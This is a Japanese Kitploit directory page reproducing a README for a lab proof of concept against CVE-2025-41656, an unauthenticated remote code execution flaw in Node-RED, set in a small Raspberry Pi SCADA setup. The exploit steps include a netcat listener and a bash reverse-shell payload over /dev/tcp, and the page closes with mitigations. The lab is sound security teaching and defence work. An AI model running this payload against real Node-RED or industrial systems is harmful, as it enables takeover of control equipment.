Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-41656 — このリポジトリには、CVE-2025-41656のPoCをテストおよび実行するために必要なコードとファイルが含まれています。 | Kitploit
ツール/GitHubGitHub/wallyschag/cve-2025-41656
IoTセキュリティ脆弱性分析エクスプロイトSCADA/ICSセキュリティ学習と教育ラボと実践
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

このリポジトリには、CVE-2025-41656のPoCをテストおよび実行するために必要なコードとファイルが含まれています。

リポジトリを見る
2410ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-41656

プロジェクト概要

このプロジェクトは、NodeRED向けの認証なしリモートコード実行脆弱性である CVE-2025-41656 をモデル化するために存在します。この脆弱性をモデル化するために、ラズベリーパイ、アクチュエータ、センサーを使用した小型フォームファクタのSCADAシステムを作成しました。ラズベリーパイにはNodeREDとOpenPLCのコンテナが含まれており、Modbus TCPを介して通信し、アクチュエータを制御します。これは、CVE-2025-41656攻撃を実行するためのPython概念実証スクリプトです。目標は、PoCを正常に作成し、システムを保護するための対策を見つけることです。

はじめに

ラボには以下のものが含まれます

  • Rasberry Pi 3b+
  • NodeRED および OpenPLC コンテナを含む Docker compose ファイル
  • アクチュエータ
  • センサー
  • アクチュエータによって制御される電動デバイス
  • 注意: セットアップはお持ちのハードウェアによって異なります。適宜調整してください。

ソフトウェアのインストール

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

Docker のセットアップ

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • Docker コンテナとネットワークブリッジが起動していることを確認してください
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • 両方の Docker コンテナが起動している必要があります。
  • また、両方のコンテナがネットワークに接続され、IP アドレスが割り当てられていることを確認してください。

エクスプロイト

  • ホストマシン上で nc -lvnp 1234 を実行してください
  • cve_2025_41656.py 内の NODE_RED_IP と NODE_RED_PORT を、NodeRED サービスの IP アドレスとポート (1880) に変更してください。
  • cve_2025_41656 内の行 "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", の IP アドレスを、エクスプロイトを起動するマシンの IP アドレスに変更してください。
root@kitploit:~
python3 cve_2025_41656.py
  • これで NodeRED コンテナ上にリバースシェルが取得できているはずです。

緩和策

  • NodeRED に TLS と認証メカニズムを実装する。
  • SCADA ネットワークをセグメント化し、NodeRED への不正アクセスを防ぐ。
  • リバースシェルトラフィックを検出する IDS/IPS システムを使用して、NodeRED を含むネットワークを監視する。
ツールをダウンロード